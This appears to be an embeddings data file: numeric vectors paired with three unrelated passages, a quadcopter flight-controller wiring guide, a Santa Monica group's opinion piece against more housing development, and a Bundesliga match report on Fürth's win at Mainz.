-0.0342978835105896, -0.00549930427223444, -0.010079734027385712, 0.13771569728851318, 0.038658201694488525, -0.07590818405151367, 2.0653689209916988e-33, 0.05847368389368057, 0.029306801036000252, 0.050807226449251175, -0.01554987020790577, -0.10822776705026627, -0.045540690422058105, 0.026057986542582512, 0.012466758489608765, 0.006258310750126839, -0.0033943294547498226, -0.006343652959913015, 0.018038997426629066, 0.04967213422060013, 0.011099894531071186, 0.026209237053990364, -0.05362604558467865, -0.06367470324039459, -0.02730540558695793, -0.03623192384839058, -0.03257390856742859, -0.010289186611771584, 0.025052914395928383, 0.06715627014636993, 0.047551319003105164, -0.14991435408592224, -0.05057445913553238, 0.007930973544716835, 0.06155611574649811, -0.046519432216882706, -0.004593982826918364, 0.03324016183614731, 0.09376341104507446, 0.11615990847349167, 0.020296160131692886, -0.058751869946718216, 0.023864248767495155, 0.03883150964975357, 0.02559860423207283, -0.0186611320823431, -0.0226740799844265, -0.016585519537329674, -0.01906348578631878, 0.09268978983163834, -0.032796140760183334, -0.026875251904129982, -0.04406134411692619, 0.006889172829687595, -0.04912443086504936, -0.1242566704750061, -0.021563494578003883, 0.05344502255320549, -0.005612517707049847, -0.07252141833305359, -0.02622993290424347, 0.0021720323711633682, -0.013383202254772186, -0.014405711553990841, -0.06347715109586716, 0.04710206016898155, 0.05404212698340416, -0.12435416132211685, -0.036853570491075516, 0.031169569119811058, -0.05192698910832405, -0.03439936414361, -0.054319508373737335, 0.050422582775354385, 0.07185277342796326, 0.02228006161749363, 0.13603034615516663, 0.07270675897598267, 0.02125517837703228, -0.07564733177423477, 0.0019977008923888206, 0.06917954236268997, 0.0060353707522153854, -0.0074789817444980145, -0.005861739162355661, 0.05073762312531471, -0.0006168631371110678, 0.0323130339384079, -0.0656471773982048, -0.01976538635790348, -0.010194510221481323, 0.09156671911478043, 0.011345786042511463, 0.013700801879167557, -0.015387095510959625, 0.026870613917708397, -0.0469026044011116, -0.0157244261354208, 0.0061999037861824036, 0.018321329727768898, -0.07757720351219177, 0.020407218486070633, -3.704581466875978e-33, -0.0226045623421669, -0.019965875893831253, 0.0032037461642175913, 0.046667441725730896, -0.09065761417150497, -0.05042831227183342, 0.023612160235643387, -0.06212756410241127, 0.006055762059986591, -0.07082568109035492, -0.058958668261766434, -0.015932369977235794, 0.046419911086559296, 0.08495868742465973, -0.00492970272898674, 0.007586854975670576, -0.03422988951206207, -0.09763721376657486, 0.04640686511993408, -0.048597533255815506, 0.003271661000326276, 0.07668475061655045, -0.019668955355882645, 0.129656121134758, -0.11350391805171967, -0.07781796902418137, -0.14491423964500427, 0.020352235063910484, 0.036516010761260986, 0.004223566967993975, -0.01683310978114605, 0.018889103084802628, 0.021798821166157722, -0.013899522833526134, -0.0140686621889472, 0.021026866510510445, 0.02704557031393051, -0.07812265306711197, -0.037064336240291595, -0.026257796213030815, 0.05751261115074158, -0.03716680407524109, -0.031656596809625626, -0.008160929195582867, 0.01745143160223961, 0.05209991708397865, -0.05504347383975983, -0.008035085164010525, -0.029756125062704086, 0.04631177708506584, -0.013846094720065594, 0.060777951031923294, -0.06394987553358078, 0.04615795612335205, -0.011404669843614101, 0.036248546093702316, 0.011005910113453865, 0.023740075528621674, -0.019138624891638756, 0.03133505582809448, -0.03108903579413891, 0.038077760487794876, -0.04845164343714714, 0.017051788046956062, 0.026862429454922676, -0.035096656531095505, -0.0012495734263211489, -0.12687550485134125, 0.04152892902493477, -0.03082125447690487, -0.043428268283605576, -0.12283383309841156, -0.04698784649372101, -0.06754718720912933, -0.03397592157125473, 0.03713928908109665, 0.048744168132543564, 0.08661587536334991, 0.005264214240014553, 0.02172112464904785, 0.06536976248025894, -0.03616616129875183, -0.030499519780278206, -0.032037220895290375, 0.011227401904761791, -0.010195734910666943, 0.02665683627128601, -0.08124265819787979, -0.058578379452228546, 0.06337078660726547, -0.09740813821554184, 0.10862474888563156, -0.01726115122437477, -0.006902365945279598, 0.028139416128396988, -5.427788707379477e-8, -0.005933291744440794, 0.019235897809267044, -0.046969298273324966, 0.015188747085630894, 0.054364874958992004, 0.05469492822885513, -0.020083921030163765, 0.11500443518161774, -0.034876298159360886, -0.036670297384262085, 0.15799547731876373, 0.06360238790512085, -0.024192726239562035, -0.016326256096363068, -0.07056187093257904, -0.021297885105013847, -0.017962926998734474, 0.06309442222118378, -0.028144078329205513, -0.019380906596779823, 0.05803531035780907, 0.050163403153419495, -0.04097391664981842, -0.024922523647546768, 0.007274078205227852, -0.022188443690538406, 0.027982795611023903, 0.045711882412433624, -0.04211587831377983, -0.04741266742348671, -0.001315647503361106, -0.04123017191886902, -0.017733341082930565, 0.0016873294953256845, 0.04047383368015289, 0.048605725169181824, -0.04078705981373787, -0.03425457701086998, 0.11518661677837372, -0.019407160580158234, -0.001374569721519947, 0.00429442897439003, -0.06505952775478363, -0.05513458326458931, -0.06729044765233994, -0.025451673194766045, -0.063112273812294, -0.019352508708834648, 0.022341890260577202, -0.08136231452226639, -0.04581746086478233, -0.04698055610060692, -0.04020887613296509, -0.036658428609371185, 0.020715512335300446, -0.02083800546824932, -0.042510900646448135, 0.023808704689145088, -0.03550541773438454, -0.013834807090461254, 0.07122062146663666, -0.05019596219062805, -0.050118815153837204, 0.05883103981614113 ]
So now we move on to installing the flight controller onto the frame. Now, all flight controllers have an orientation and so it is important that you secure it to your frame facing the correct way (this saves a lot of a hassle later). Specifically for the Flip32+ board that we used here, the USB port is the back of the board and the opposite side is subsequently the forward facing side. You therefore have to place the flight controller so that the forward facing side is pointing in the same direction as the front of the quadcopter (for the Silver Blade #37 there is no specific 'front' so you can choose). We secured the Flip32+ here with 3M mounting foam to the middle of the quadcopter (facing the correct way) and then we proceeded to plugging in the ESCs. We use the servo cables to plug the ESCs in (the black, red and white cable) and these plug into the output pins of the flight controller. This is because the flight controller outputs information to the ESCs to control the speed of the motor. According to which flight controller you're using, each motor is numbered 1 to 4 in a specific order (as mentioned above). You need to plug the ESC connected to motor 1 into the output pin labeled 1 on the flight controller, the ESC connected to motor 2 into the pin labeled 2 etc. You also need to plug the servo cables into the pins in the correct orientation. The three coloured wires in the cable (black, red and white) correspond to ground, voltage and signal wires respectively. You therefore need to ensure that the ground wires are connected to the ground pins, the voltage wires are connected to the voltage pins and the signal wires are connected to the signal pins. You can see this demonstrated in the pictures above. Most flight controllers will have the pins labeled with which pin is ground, which pin is voltage and which pin is signal. For example, in our Flip32+ guide, you can see that the pins are labeled with G, V and 6 (the 6 is for motor 6 but this is the signal pin).
[ 0.02063465118408203, -0.06913420557975769, -0.05849296599626541, -0.049131132662296295, 0.03298430144786835, 0.05633186921477318, -0.02295689657330513, 0.06953064352273941, 0.019625330343842506, 0.07997482270002365, 0.1488267332315445, 0.011776048690080643, -0.06638389080762863, -0.04077531769871712, -0.031046340242028236, 0.039383865892887115, 0.011340053752064705, -0.014869566075503826, 0.027558375149965286, 0.06567066162824631, 0.05491838976740837, -0.08908703923225403, 0.043323807418346405, -0.05810439959168434, -0.12425064295530319, 0.05506819859147072, 0.03093057870864868, 0.010261358693242073, -0.040969111025333405, -0.08424092829227448, 0.05945167317986488, -0.07815975695848465, 0.01946222223341465, -0.042271796613931656, 0.0028030932880938053, -0.09829040616750717, 0.04232429713010788, -0.0670858696103096, -0.057297367602586746, -0.09849663078784943, -0.015205996111035347, 0.01900499127805233, -0.01246968936175108, -0.020771177485585213, -0.013434706255793571, 0.04523554816842079, 0.03269270807504654, -0.029704539105296135, 0.08798080682754517, -0.03631860017776489, 0.04012148082256317, -0.06933946162462234, -0.0566670261323452, -0.05724816024303436, -0.05908459052443504, 0.055659811943769455, 0.009876804426312447, -0.015051616355776787, 0.047246143221855164, -0.0381757877767086, 0.15423645079135895, -0.02238861471414566, 0.030292829498648643, -0.021013328805565834, -0.07407550513744354, -0.06801024079322815, -0.008938002400100231, -0.013779625296592712, -0.03475109115242958, 0.003918464295566082, -0.007704264018684626, -0.045815374702215195, 0.0043779280968010426, -0.016389569267630577, 0.01695927418768406, 0.00931476429104805, 0.06569215655326843, 0.08901336789131165, 0.007341823074966669, 0.009714055806398392, 0.054647043347358704, 0.0458124577999115, -0.01971503719687462, 0.057498615235090256, 0.10573781281709671, -0.050109315663576126, -0.055846668779850006, 0.06116286665201187, 0.01808932051062584, -0.041510701179504395, 0.03422026336193085, -0.10190451145172119, 0.024585703387856483, -0.04808367043733597, 0.07178667932748795, -0.07333248853683472, -0.001554724178276956, -0.03794575855135918, -0.042586419731378555, 0.0039908867329359055, -0.03921502083539963, -0.03374609723687172, -0.007355363108217716, 0.04615369811654091, -0.04001346230506897, 0.026118766516447067, -0.044692881405353546, 0.01534250658005476, -0.057676609605550766, -0.0738292783498764, -0.04043672978878021, 0.0668136477470398, -0.02860534004867077, 0.04090325906872749, -0.014588465914130211, 0.01465545129030943, -0.05974086374044418, -0.02113526500761509, 0.04600954055786133, -0.06540212780237198, -0.018539803102612495, -0.024295566603541374, 0.08592288196086884, 0.02675369381904602, 0.1112237349152565, 0.01988408714532852, -0.0017154846573248506, 2.089377842094267e-33, 0.0455557256937027, 0.051962923258543015, -0.03561720252037048, 0.009282626211643219, 0.020920030772686005, 0.06323670595884323, 0.13619360327720642, 0.0747508704662323, -0.009738260880112648, 0.05838790163397789, -0.016773901879787445, -0.036100830882787704, 0.003674555802717805, 0.08545193076133728, -0.055264826864004135, -0.03702560439705849, -0.01072106882929802, -0.09556423127651215, -0.0496450699865818, -0.08359795808792114, 0.07267150282859802, -0.05397704616189003, 0.019678782671689987, -0.018240487203001976, 0.04557211697101593, -0.025633228942751884, -0.040635932236909866, 0.020356057211756706, 0.036833442747592926, 0.04894715175032616, -0.05964390188455582, -0.06665010750293732, 0.03109624981880188, -0.028082702308893204, 0.06295082718133926, 0.026780990883708, -0.016498517245054245, -0.07133977115154266, -0.007688878569751978, 0.0866808071732521, -0.050648365169763565, -0.004530946724116802, -0.053417958319187164, -0.0695728063583374, -0.08039756119251251, 0.008939462713897228, 0.03959629684686661, 0.01812490075826645, 0.05315026268362999, -0.007942795753479004, -0.023824963718652725, -0.052950382232666016, 0.01412278413772583, 0.03477206081151962, -0.006612194236367941, -0.07005208730697632, -0.03485092148184776, 0.020015351474285126, -0.03144076466560364, -0.024843361228704453, 0.10334696620702744, -0.012472826987504959, -0.024823689833283424, -0.0194057859480381, -0.011762440204620361, 0.0270223505795002, 0.0478103831410408, -0.0073629277758300304, 0.051678672432899475, -0.0012170936679467559, -0.03553791344165802, -0.007513661868870258, 0.03283379226922989, -0.02206362597644329, 0.0010589982848614454, 0.026503566652536392, -0.06739798933267593, 0.056915152817964554, -0.042593393474817276, -0.028648342937231064, 0.025675829499959946, 0.07460155338048935, -0.03279756009578705, 0.04920066520571709, 0.00710939709097147, -0.06495244055986404, -0.04946738854050636, -0.031411513686180115, 0.044965192675590515, -0.02196521870791912, 0.009566974826157093, -0.03909524902701378, 0.030168673023581505, 0.04520734027028084, 0.03176527097821236, -2.112796077285547e-33, 0.008703343570232391, -0.048676103353500366, 0.029755428433418274, -0.018465792760252953, -0.06309990584850311, 0.006822842638939619, 0.045127395540475845, 0.01321488805115223, -0.02270548976957798, -0.05221332609653473, -0.016125056892633438, 0.010572804138064384, 0.018952256068587303, -0.008512376807630062, -0.010553175583481789, 0.0085678705945611, -0.06812752783298492, 0.038971543312072754, 0.0796012282371521, -0.054739635437726974, 0.027121171355247498, 0.0649511069059372, 0.1043754294514656, -0.0329921655356884, 0.07319961488246918, 0.02993061952292919, 0.08965825289487839, 0.046688348054885864, 0.01460416242480278, 0.05206657573580742, -0.0741242840886116, -0.008621451444923878, 0.09821765869855881, 0.01861732453107834, -0.076327383518219, 0.00565001554787159, -0.046249695122241974, -0.008781136944890022, 0.017728229984641075, -0.07115081697702408, 0.020577533170580864, 0.013648174703121185, -0.03152597323060036, -0.002234287327155471, 0.06326490640640259, -0.0871807187795639, -0.029304545372724533, 0.008473943918943405, 0.05830136686563492, -0.002424536505714059, -0.04919072240591049, -0.046060800552368164, -0.05284590274095535, 0.033969633281230927, 0.09890903532505035, -0.0002038595557678491, 0.06095700338482857, -0.03228355571627617, -0.07094856351613998, 0.05594909191131592, 0.014790091663599014, 0.02083304338157177, 0.04224725067615509, -0.04935478791594505, 0.025163834914565086, 0.03460806980729103, 0.05941910669207573, 0.07524845004081726, 0.019218048080801964, -0.0035434062592685223, -0.11386103928089142, 0.026188109070062637, 0.028025252744555473, -0.00706635694950819, 0.017568469047546387, 0.03174214065074921, -0.07231578975915909, 0.06425999104976654, 0.051945075392723083, 0.043701790273189545, -0.07364407181739807, -0.07155214995145798, 0.029737848788499832, 0.04865049570798874, -0.046722039580345154, 0.05466391518712044, 0.008250972256064415, 0.06212134286761284, 0.03393763676285744, -0.05727248638868332, -0.008411339484155178, -0.049444813281297684, 0.14678846299648285, 0.12728019058704376, 0.10088533163070679, -5.975809358460538e-8, -0.03524521365761757, 0.07871856540441513, 0.02073105052113533, 0.01766711287200451, -0.10491380095481873, 0.01632525399327278, 0.04248930513858795, -0.08163722604513168, -0.038420066237449646, -0.06285138428211212, -0.06523510068655014, 0.04757191240787506, -0.031217819079756737, 0.02853744477033615, 0.03152977302670479, 0.11845508217811584, -0.05162821710109711, 0.003606862621381879, 0.01383177563548088, -0.053541116416454315, 0.06644786149263382, -0.05906962603330612, 0.053157251328229904, 0.032493073493242264, -0.019590748474001884, 0.019373120740056038, -0.07473732531070709, 0.05797908827662468, -0.05489916354417801, -0.00321398233063519, -0.08144404739141464, -0.05401437357068062, 0.010814126580953598, 0.04651034623384476, -0.03503558784723282, -0.023134665563702583, -0.07109790295362473, -0.03138633444905281, 0.0570363849401474, -0.008802458643913269, 0.03934408724308014, 0.039495982229709625, -0.08419789373874664, -0.02660241350531578, 0.04543968662619591, 0.04917801171541214, -0.02488674409687519, 0.010362370871007442, -0.11627215147018433, 0.01011101994663477, -0.012631461955606937, -0.014552329666912556, -0.016636241227388382, 0.10782719403505325, 0.06562291830778122, 0.0581204816699028, -0.049815718084573746, -0.04707802087068558, 0.018649373203516006, -0.018277542665600777, 0.02770627848803997, -0.006472168490290642, -0.03716907277703285, 0.003183071967214346 ]
Santa Monica does not have a housing crisis. The Southern Counties Association of Governments (SCAG) target for our City is 239 new units per year. This is a fair number that reflects our percentage of growth for the Southern California region. In the last three years we have approved an average of 253 new units per year. In addition we have another 1929 units (not counting 679 units in withdrawn projects) in the pipeline at various stages of approval processing. If only half of those projects go to term over the next three years we would have approved an average of another 321 units in the next three years or 1/3 more than our SCAG requirement. Simply stated we are already meeting more than our fair share of the region’s housing demand in addition to all the other benefits our small city provides to the region. In fact, Santa Monica’s population increase (2000-2010), which we can see everyday in our traffic overload, was over twice that of Los Angeles County (6.7% vs 3.1%). While housing is very expensive in Santa Monica, as it is in all beach communities, our median incomes are 20-25% higher than LA County’s. Because of that, our city is actually more affordable to its residents than to the average citizen in LA County. For example, 56% of our property owners (1/4 of our population) pay more than 30% of their income for their housing, while 67% of the average Angelo homeowners pay that burden. Likewise 67% of our renters (3/4 of our population) pay that unreasonable burden, while 85% of Los Angeles County renters are similarly encumbered. Even though rent control is slowly being weakened, thanks primarily to our robust affordable housing program, which maintains 10-20% of the new units as deed restricted affordable units, affordability is still substantially protected in the future. In a relatively wealthy city, we have made Santa Monica comparatively more affordable than Los Angeles County. And remember, this was done in the depths of a recession on some of the most expensive land on the Westside. The ability to maintain affordability of our housing stock through the combined efforts of the City Council and staff, of the Rent Control Board and of affordable housing providers like Community Corp and of affordability advocates like SMRR to name just a few, is an incredible achievement. We can all be proud of this achievement. In short we can stop beating ourselves up about needing more and more housing and focus instead on the consequences of this abundant housing production, particularly as its burden escalates in the future. It is already colliding with our sustainability goals. We simply do not have the water for the 8,000 new residents who are to join us in the next 20 years. In fact we do not have enough water for our current homes and businesses since we import about a third of our water from collapsing sources such as the Sierra snow pack (the expected El Nino this year will not undo four years of drought). Most of the new housing is headed toward Downtown, which does not even have an elementary school, so those students will need to go across half the town to possibly McKinley. Only one in nine of our workers live and work in the City so we cannot substantially reduce our job/housing imbalance by building more housing, since 9 of the 10 new workers will still work outside of the City adding to our peak hour traffic crushes. And there is no certainty this ratio will likely improve with the advent of the light rail next year. It may actually get worse. This housing production is not free. New residents require more schools, water, power, traffic upgrades, fire and police services. In countless ways this growth burdens our infrastructure which is already compromised and has limited expansion capability in a built out city. For example, where would you amass enough land for the next elementary school? Where would you build the desalinization plant when desalinization becomes a cost competitive (and ecologically sound) water source? Where would you move the City yards to when Memorial Park is expanded? These are not trivial problems when you consider, for example, that we have the least amount of open park space and are the second densest city in California for coastal cities of our comparable size. The limitations of space in our impacted City means that infrastructure upgrades become much more expensive and increase faster than the tax base to support them. Whenever our growth expands beyond our infrastructure’s capacity, in all senses of the word, all the residents end up paying a horrible civic price in cost (have you looked at your water bill lately), in time and in quality of life. Unfortunately the trumped-up housing supply crisis in our City has become a Trojan horse to try to drive more unsustainable development into our City. The poster boy for this is the recently approved Santa Monica Plaza project which the City Council green lighted to the next approval level with an astonishing 12 stories and a pitiful fig leaf of only 48 affordable units. The evolving Downtown Specific Plan is also freighted with an unsustainable amount of development. Cities cannot and should not expand infinitely. Only so much land, sunlight and water is available to our City. For example cities actually do run out of water: even big ones like Sao Paolo, Brazil. So in our built-out beachside City we cannot sustainably produce all the housing there is demand for in our region, nor should we try, since we are already providing more than our fair share of housing AND other vital regional services: recreation (beaches), job creation (silicone beach), transportation (airport and light rail), entertainment (3rd Street Promenade, the pier), health (two regional hospitals), education (Santa Monica College) and tourism (hotel industry). Those other regional services are as equally regionally important as the housing we provide. However our most significant regional contribution is to be a low rise city where residents, visitors and tourists can relax and get relief from the urban pandemonium all around us. Relaxed living that’s our real mission statement in this region and this aligns with the interests of our residents. When we compare ourselves to other beachside Cities we do more than our share in many categories. How many regional hospitals does does Malibu have? Does Redondo Beach have a 30,000 student junior college? Does Manhattan Beach have an airport? We do housing very well, but it is just a small part of our metropolitan role. Sustainability of all our regional contributions without burdening our residents should be our major focus, not any one at the expense of the others. SMa.r.t. (Santa Monica Architects for a Responsible Tomorrow) Advertisements
[ 0.12709064781665802, -0.10071845352649689, 0.01864900439977646, 0.058949608355760574, 0.0766684040427208, 0.06796474009752274, -0.07053272426128387, -0.016001302748918533, -0.06915650516748428, -0.008887404575943947, 0.011378215625882149, 0.013229339383542538, 0.03834369033575058, 0.02478024736046791, 0.1201261505484581, 0.016548456624150276, -0.0255084540694952, -0.07658162713050842, 0.03105318173766136, 0.008144267834722996, 0.04461139813065529, -0.02706937864422798, -0.054668448865413666, 0.04855456203222275, 0.05374279245734215, -0.018850548192858696, -0.042656101286411285, 0.02976241335272789, -0.06937948614358902, 0.012528662569820881, 0.040017884224653244, 0.0994947999715805, 0.07254741340875626, -0.04331330209970474, 0.11309471726417542, -0.05523693561553955, 0.03696322813630104, 0.021172216162085533, -0.05524516850709915, -0.03132449835538864, -0.03296692669391632, -0.0208145584911108, -0.020270731300115585, -0.018808534368872643, -0.1573721021413803, 0.0033044840674847364, -0.0138793233782053, 0.049229323863983154, 0.02263074554502964, -0.01163498219102621, -0.0001379801396979019, 0.05944088101387024, 0.04784774407744408, -0.013414503075182438, -0.01877574436366558, 0.06199810281395912, 0.05682433769106865, -0.03373377397656441, -0.008452736772596836, -0.013788023963570595, -0.02480602078139782, -0.03827005252242088, -0.01262342743575573, -0.02064739540219307, 0.0668577328324318, -0.006468839943408966, 0.02037387154996395, -0.035386454313993454, -0.06452438980340958, 0.026553582400083542, 0.060602568089962006, -0.008214938454329967, 0.017777005210518837, 0.01834988035261631, 0.07002577185630798, -0.0212965440005064, 0.02109917625784874, 0.05831463262438774, 0.07759955525398254, -0.00048819719813764095, 0.014997811987996101, -0.03992949053645134, -0.16281503438949585, -0.014217027463018894, -0.05153572931885719, 0.011501168832182884, 0.0171924140304327, -0.0025949408300220966, 0.006111133377999067, 0.06139346584677696, 0.01712552271783352, 0.020843738690018654, 0.007591593079268932, -0.042717888951301575, 0.05347113311290741, 0.04778444021940231, -0.0647844448685646, -0.052728500217199326, -0.006852285470813513, 0.002164097735658288, -0.013590713031589985, 0.002124121878296137, 0.07708609849214554, -0.11236430704593658, 0.015476476401090622, -0.04315878078341484, -0.04924602434039116, 0.014814394526183605, -0.05278673768043518, 0.01104253251105547, 0.0633263811469078, -0.05925731733441353, -0.014702496118843555, 0.03468814119696617, -0.02372615411877632, 0.02175891026854515, 0.08446227014064789, -0.01720106042921543, -0.0336037315428257, 0.02441529557108879, 0.018015632405877113, 0.030053751543164253, -0.07173758000135422, -0.010482006706297398, 0.027021223679184914, 0.008907523937523365, -0.08812768012285233, 1.6082439635408738e-33, 0.052491310983896255, 0.053787704557180405, -0.035007670521736145, 0.023323502391576767, -0.02188696898519993, -0.06995601207017899, 0.037547677755355835, 0.0837705135345459, 0.019706839695572853, -0.03304443880915642, 0.007094800937920809, 0.03685840219259262, 0.0531807579100132, 0.05714584141969681, 0.09917484223842621, -0.052054401487112045, -0.03240063786506653, -0.029430294409394264, -0.04330113157629967, -0.0036960600409656763, -0.028328441083431244, -0.05241827294230461, -0.022132225334644318, 0.04933570697903633, -0.011695275083184242, -0.05822232365608215, 0.0282225850969553, 0.05956422910094261, -0.033425576984882355, 0.0018450658535584807, 0.03915311396121979, 0.08309856802225113, 0.09168626368045807, 0.004878516774624586, 0.014690871350467205, -0.02705109864473343, -0.010176991112530231, 0.006374165881425142, -0.05560298636555672, 0.015188775956630707, 0.03015083447098732, 0.0003247851273044944, 0.021018942818045616, 0.04586223140358925, 0.05758567899465561, -0.01720191165804863, 0.06565432250499725, -0.03386141359806061, -0.09992632269859314, 0.06695003062486649, 0.040300868451595306, 0.04963643476366997, -0.09725736081600189, 0.03342427313327789, -0.060849629342556, -0.045929260551929474, -0.0291526447981596, -0.02304341085255146, 0.04373626410961151, -0.03907092660665512, -0.0696907639503479, -0.03783733397722244, 0.03461536392569542, -0.027488766238093376, -0.01059438195079565, 0.04223492741584778, 0.08880523592233658, 0.07669848948717117, 0.038278497755527496, -0.02054818719625473, 0.02697465941309929, -0.10444651544094086, 0.004986981861293316, 0.06085710600018501, 0.06085385009646416, -0.017052939161658287, -0.021040644496679306, 0.05986010655760765, 0.05530872568488121, -0.0036832888144999743, -0.061801716685295105, 0.055418699979782104, -0.02247014455497265, -0.000503294519148767, 0.08652947098016739, -0.01964566670358181, 0.049975261092185974, 0.01861427165567875, -0.04899166151881218, -0.08327767997980118, -0.016054607927799225, -0.03337784856557846, 0.05150831490755081, 0.02552170492708683, 0.0010788656072691083, -4.619483781142334e-33, -0.09331519156694412, -0.0070534260012209415, 0.03049320913851261, 0.006595270708203316, -0.06049300730228424, 0.009671913459897041, 0.03542627766728401, -0.08080253005027771, 0.024250080808997154, -0.06466742604970932, -0.10611343383789062, -0.02937231957912445, 0.12675295770168304, 0.001358867040835321, -0.021476777270436287, -0.0027564819902181625, 0.05900115147233009, -0.10425285249948502, -0.003096431028097868, -0.01780029758810997, -0.021704010665416718, 0.0668322890996933, 0.045693740248680115, 0.05340533331036568, 0.060835763812065125, -0.005198396742343903, -0.09128733724355698, 0.010145781561732292, 0.030954884365200996, -0.027467111125588417, -0.03325260803103447, -0.051425449550151825, -0.043889120221138, -0.012365888804197311, -0.02350621111690998, -0.01974458061158657, 0.021091898903250694, -0.03669296205043793, -0.0499923937022686, 0.07127311080694199, 0.058487098664045334, -0.04699736833572388, 0.015725521370768547, 0.023225456476211548, -0.018781866878271103, -0.013900479301810265, 0.01546924002468586, -0.06778214871883392, -0.005719227250665426, -0.02545933611690998, 0.006213585380464792, 0.04099034518003464, -0.11160651594400406, 0.05669047310948372, 0.015806764364242554, 0.0025485639926046133, -0.0018470027716830373, 0.03613679111003876, -0.1405763328075409, 0.011997333727777004, -0.014247670769691467, 0.08180851489305496, -0.07528449594974518, 0.03502911329269409, 0.01694159209728241, -0.08491650223731995, 0.03515169769525528, -0.15830954909324646, 0.009424944408237934, -0.07908269762992859, 0.006799738854169846, -0.035328835248947144, -0.041981104761362076, 0.038461387157440186, -0.10420259833335876, -0.017562013119459152, -0.0088794631883502, 0.034634191542863846, -0.0300820991396904, 0.023450817912817, -0.039408985525369644, -0.0019456581212580204, -0.054121069610118866, -0.016328779980540276, 0.02656913921236992, 0.005427177995443344, -0.04333554580807686, -0.10011330991983414, -0.012565524317324162, 0.07163707166910172, -0.11632488667964935, 0.04412633553147316, -0.10056707262992859, -0.012991014868021011, 0.03584301844239235, -5.462618091200966e-8, 0.1578119397163391, 0.08608002960681915, -0.015988240018486977, 0.002663110848516226, 0.08371765911579132, -0.030200647190213203, -0.012018095701932907, 0.08298780024051666, 0.016450146213173866, 0.037072811275720596, 0.06675666570663452, 0.005141387693583965, 0.011966004967689514, 0.014865562319755554, -0.08733643591403961, 0.037277959287166595, -0.019029762595891953, 0.02250937931239605, -0.0590391643345356, -0.08212890475988388, 0.012846134603023529, 0.0012687243288382888, -0.03958570957183838, 0.06060517579317093, -0.02501239813864231, -0.00041651498759165406, -0.03326534107327461, 0.05217009782791138, 0.0055720009841024876, -0.001151585252955556, -0.040438562631607056, -0.059942614287137985, -0.03227528929710388, -0.055547211319208145, 0.03104523755609989, -0.016031477600336075, 0.018860630691051483, -0.03993814066052437, 0.037565845996141434, 0.0680924504995346, 0.07361295819282532, -0.024647196754813194, -0.07813792675733566, 0.0030967958737164736, -0.05944373086094856, -0.07847662270069122, -0.10847090184688568, -0.015039355494081974, 0.01321864128112793, -0.0014022665563970804, 0.006690610200166702, -0.008802696131169796, -0.088969886302948, 0.10581537336111069, 0.04515751451253891, -0.06927891820669174, -0.039920054376125336, -0.06674444675445557, 0.009802632965147495, 0.04624378681182861, 0.0010129096917808056, -0.0016703647561371326, -0.040734704583883286, 0.027327274903655052 ]
Greutner Fürth got their first taste of Bundesliga victory on Friday when Felix Klaus led his newly promoted team to a 1-0 away victory in the 67th minute. After being teed up by Illir Azemi, Klaus scored the only goal of the match when his dipping left-foot strike went straight over Christian Wetklo. Like several of his team mates, Klaus had never played in the top division before this season. Mainz had dominated throughout the match, but failed to make use of their chances. Maxim Choupo-Moting was the main culprit for Mainz, missing several good opportunities. After going a goal down, Mainz coach Thomas Tuchel brought on Marcel Risse and Eugen Polanski in an attempt to snatch a draw, but the home side could not turn things around. Up until their debut Bundesliga game at home last week, when they lost 3-0 to Bayern Munich, Fürth had not taken part in top flight football since they participated in the last edition of the old German first division in 1962/1963. The following season they were not among the 16 clubs chosen to take part in the inaugural Bundesliga and were unable to recover. Friday's performance and a first-match draw in Freiburg have left Mainz with one point from two games. Defending champions Borussia Dortmund play Nuremberg on Saturday, while Bayern Munich are defending their Bundesliga lead at home against VfB Stuttgart on Sunday.
[ 0.018741877749562263, 0.03243456780910492, -0.008274166844785213, -0.02037440985441208, 0.049517955631017685, 0.032950691878795624, 0.04320792853832245, 0.12493161857128143, 0.028347771614789963, -0.02127382531762123, -0.0007644943543709815, -0.001979720313102007, -0.017324702814221382, 0.07864537835121155, 0.02714059315621853, -0.09676121175289154, -0.06350824981927872, -0.037004828453063965, -0.030109478160738945, 0.018673498183488846, -0.011563570238649845, -0.060118794441223145, -0.046248048543930054, -0.03863974288105965, 0.0730956494808197, -0.1076926738023758, 0.0345202200114727, -0.09152722358703613, 0.002850734628736973, -0.05444872006773949, 0.060780514031648636, -0.03520938754081726, 0.0254739448428154, -0.04648048058152199, -0.025904223322868347, 0.025104422122240067, 0.03899485245347023, -0.059386271983385086, -0.017039725556969643, 0.02515850029885769, -0.059986408799886703, 0.017698129639029503, -0.04743952676653862, 0.04052044078707695, -0.057447969913482666, 0.015147932805120945, 0.08315949887037277, 0.036855388432741165, -0.0721178874373436, 0.02937752567231655, 0.006073767319321632, 0.005963445175439119, 0.04992116615176201, 0.03364954888820648, -0.012153849005699158, 0.12168703973293304, -0.045454204082489014, -0.01257612369954586, -0.015058712102472782, -0.0711050033569336, -0.016515837982296944, -0.041492972522974014, -0.005834632087498903, -0.048096735030412674, -0.11006702482700348, -0.0932164341211319, 0.035250984132289886, -0.048215143382549286, -0.010851878672838211, 0.1076972484588623, 0.052652571350336075, -0.08196811378002167, 0.024332774803042412, -0.03879249840974808, 0.0701410174369812, 0.06970268487930298, -0.06610260903835297, 0.02362801507115364, 0.04943976551294327, -0.022206014022231102, -0.02206961251795292, -0.057916849851608276, -0.041350916028022766, 0.09267064183950424, 0.002561772707849741, 0.006561078131198883, 0.03494725376367569, 0.016395943239331245, 0.040500953793525696, -0.07010100036859512, -0.014371608383953571, -0.016369620338082314, 0.02731981687247753, -0.012753318063914776, 0.011532564647495747, 0.02625397779047489, -0.008031968027353287, 0.06765010952949524, 0.07651828974485397, 0.04809447377920151, -0.023381248116493225, 0.04789259657263756, -0.033911388367414474, 0.024163909256458282, 0.016515973955392838, 0.03704312816262245, 0.04507237300276756, 0.040787696838378906, 0.011090262793004513, -0.01682962290942669, -0.025470135733485222, 0.03530742973089218, 0.08808909356594086, 0.013770153746008873, -0.026923930272459984, -0.006555613130331039, 0.04329395666718483, -0.005513899493962526, 0.0051607112400233746, 0.06512747704982758, 0.038624733686447144, 0.07992663979530334, -0.05176819488406181, 0.08654990792274475, -0.01045164279639721, 0.11281859874725342, 0.12445319443941116, 5.2419359578935676e-33, 0.030282892286777496, -0.0755428820848465, -0.06970163434743881, -0.030256114900112152, 0.01681659184396267, 0.04046284034848213, -0.025087492540478706, -0.0696524977684021, -0.05208431929349899, -0.025231601670384407, -0.07881971448659897, -0.06076276674866676, 0.011050596833229065, -0.0776224359869957, 0.009692346677184105, 0.08505082875490189, 0.01886104606091976, -0.017234520986676216, 0.009193159639835358, 0.03926866874098778, 0.07129183411598206, -0.017161648720502853, -0.012877299450337887, -0.014570558443665504, 